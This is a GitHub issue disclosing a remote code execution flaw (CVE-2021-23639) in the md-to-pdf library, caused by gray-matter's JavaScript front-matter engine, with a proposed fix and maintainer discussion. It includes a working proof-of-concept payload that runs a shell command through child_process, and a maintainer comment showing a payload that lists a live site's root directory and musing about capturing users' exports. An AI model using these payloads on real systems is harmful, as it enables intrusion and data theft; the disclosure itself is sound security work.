
Security: gray-matter exposes front matter JS-engine that leads to arbitrary code execution


The library gray-matter (used by md-to-pdf to parse front matter) exposes a JS-engine by default, which essentially runs eval on the given Markdown.

https://github.com/simonhaenisch/md-to-pdf/blob/master/src/lib/md-to-pdf.ts#L26

Given that md-to-pdf is only a Markdown-to-PDF library and looking at how other projects use it - I think it is an undesirable feature to be able to execute any arbitrary JavaScript by anyone in control of the Markdown content.

A possible fix would be to override gray-matter’s JS-engine:

const { content: md, data: frontMatterConfig } = grayMatter(mdFileContent, { engines : { js : () => {} } } );

PoC:

$ cat /tmp/RCE.txt
cat: /tmp/RCE.txt: No such file or directory
$ node poc.js 
$ cat /tmp/RCE.txt
uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu)

poc.js:

const { mdToPdf } = require('md-to-pdf');

var payload = '---js\n((require("child_process")).execSync("id > /tmp/RCE.txt"))\n---RCE';

(async () => {
	await mdToPdf({ content: payload }, { dest: './output.pdf' });
})();

Issue Analytics

  • State:closed
  • Created 2 years ago
  • Comments:6 (4 by maintainers)

Top GitHub Comments

5 reactions
simonhaenisch commented, Sep 23, 2021

BTW I saw in your GitHub activity that you also raised an issue with dillinger.io which is using this package, and I’m actually able to use this exploit there, e.g. I would add a front matter like

---js
{
    css: `body::before { content: "${require('fs').readdirSync('/').join()}"; display: block }`,
}
---

and then use export > PDF. I’m not sure about the damage that can be done here but one idea would be to try and send myself all file exports that are happening in the hopes that someone uses dillinger.io for secret/internal data.

FYI @joemccann, I’ll see that I get a new major version out that disables this feature by default, and make a PR to your repo to update the package.

1 reaction
magicOz commented, Sep 22, 2021

The documentation seems to be a bit misleading and { language : '...' } actually just means the default engine if the language identifier is omitted from the front matter, all engines are still accessible by using ---<language identifier>.

Agree, an opt-in config option for which engines to use makes sense and sounds like the right way to solve this.


Related advisory: CVE-2021-23639 (Security: gray-matter exposes front matter JS-engine that leads to arbitrary code execution · Issue #99 · simonhaenisch/md-to-pdf)